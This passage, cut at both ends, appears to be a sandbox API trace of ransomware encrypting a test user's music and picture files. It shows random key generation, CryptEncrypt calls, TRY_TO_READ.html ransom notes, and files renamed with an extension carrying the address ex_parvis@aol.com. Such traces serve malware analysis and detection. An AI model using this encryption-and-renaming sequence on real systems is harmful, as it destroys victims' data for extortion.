dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0167.552] GetProcessHeap () returned 0x2e0000 [0167.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.552] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.552] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.553] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.553] GetProcessHeap () returned 0x2e0000 [0167.553] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.553] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.553] WriteFile (in: hFile=0x558, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.554] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.554] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x558, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.554] SetFilePointer (in: hFile=0x558, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.554] WriteFile (in: hFile=0x558, lpBuffer=0x31f5f0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.555] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb50e90, ftCreationTime.dwHighDateTime=0x1d4cf53, ftLastAccessTime.dwLowDateTime=0xb168bc30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb168bc30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b19e8 [0167.555] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\td1paJ\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\td1paj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0167.558] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\vtgXZtjwld\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\vtgxztjwld\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0167.561] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0167.563] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.563] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.563] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a", dwFileAttributes=0x80) returned 1 [0167.563] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a") returned 74 [0167.564] GetProcessHeap () returned 0x2e0000 [0167.564] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363b58 [0167.564] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a" [0167.564] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0167.564] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ylrufnudyyhaqjb6gzgk.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ylrufnudyyhaqjb6gzgk.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.566] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\YlRuFNudYYHaqJb6GZgk.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ylrufnudyyhaqjb6gzgk.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0167.567] GetProcessHeap () returned 0x2e0000 [0167.567] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.567] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=87453) returned 1 [0167.567] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1559d [0167.567] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.567] GetProcessHeap () returned 0x2e0000 [0167.567] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.567] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.567] WriteFile (in: hFile=0x55c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.568] WriteFile (in: hFile=0x55c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.568] WriteFile (in: hFile=0x55c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x55c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1559d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1559d, lpOverlapped=0x0) returned 1 [0167.569] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.569] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.569] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3", dwFileAttributes=0x80) returned 1 [0167.570] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3") returned 73 [0167.570] GetProcessHeap () returned 0x2e0000 [0167.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31f5f0 [0167.570] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3" [0167.570] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.570] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\v-qenopjsw h4ugd1 1.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\v-qenopjsw h4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.572] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\V-qEnOpJsw H4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\v-qenopjsw h4ugd1 1.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0167.572] GetProcessHeap () returned 0x2e0000 [0167.572] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.572] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=77341) returned 1 [0167.572] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x12e1d [0167.572] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.572] GetProcessHeap () returned 0x2e0000 [0167.572] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.572] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.572] WriteFile (in: hFile=0x55c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.573] WriteFile (in: hFile=0x55c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.573] WriteFile (in: hFile=0x55c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x55c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x12e1d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x12e1d, lpOverlapped=0x0) returned 1 [0167.574] SetFilePointer (in: hFile=0x55c, lDistanceToMove=-77341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.574] WriteFile (in: hFile=0x55c, lpBuffer=0x3c5238*, nNumberOfBytesToWrite=0x12e1d, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c5238*, lpNumberOfBytesWritten=0x2acf9c8*=0x12e1d, lpOverlapped=0x0) returned 1 [0167.574] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7990fa40, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xb16d7ef0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb16d7ef0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1a28 [0167.575] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.575] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.575] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png", dwFileAttributes=0x80) returned 1 [0167.575] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png") returned 72 [0167.575] GetProcessHeap () returned 0x2e0000 [0167.575] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf6) returned 0x31fae0 [0167.575] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png" [0167.575] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png.12781717671972518758.ex_parvis@aol.com.AIR" [0167.575] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\ulykmpj cpsyvjbv3.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\ulykmpj cpsyvjbv3.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.578] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\uLYKmPj cpSyvjbV3.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\ulykmpj cpsyvjbv3.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560 [0167.578] GetProcessHeap () returned 0x2e0000 [0167.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.578] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=23520) returned 1 [0167.578] SetFilePointer (in: hFile=0x560, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5be0 [0167.578] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.578] GetProcessHeap () returned 0x2e0000 [0167.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.578] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.578] WriteFile (in: hFile=0x560, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.579] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.579] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x560, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x5be0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x5be0, lpOverlapped=0x0) returned 1 [0167.579] SetFilePointer (in: hFile=0x560, lDistanceToMove=-23520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.579] WriteFile (in: hFile=0x560, lpBuffer=0x3b7ff8*, nNumberOfBytesToWrite=0x5be0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b7ff8*, lpNumberOfBytesWritten=0x2acf9c8*=0x5be0, lpOverlapped=0x0) returned 1 [0167.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.581] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg", dwFileAttributes=0x80) returned 1 [0167.581] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg") returned 69 [0167.581] GetProcessHeap () returned 0x2e0000 [0167.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf0) returned 0x30a498 [0167.581] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg" [0167.581] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0167.581] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\eexu3r t9cqsl2.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\eexu3r t9cqsl2.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.583] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\eexU3r t9CQsL2.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\eexu3r t9cqsl2.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560 [0167.583] GetProcessHeap () returned 0x2e0000 [0167.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.583] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=91058) returned 1 [0167.583] SetFilePointer (in: hFile=0x560, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x163b2 [0167.583] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.583] GetProcessHeap () returned 0x2e0000 [0167.584] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.584] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.584] WriteFile (in: hFile=0x560, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.584] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.585] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.585] ReadFile (in: hFile=0x560, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x163b2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, 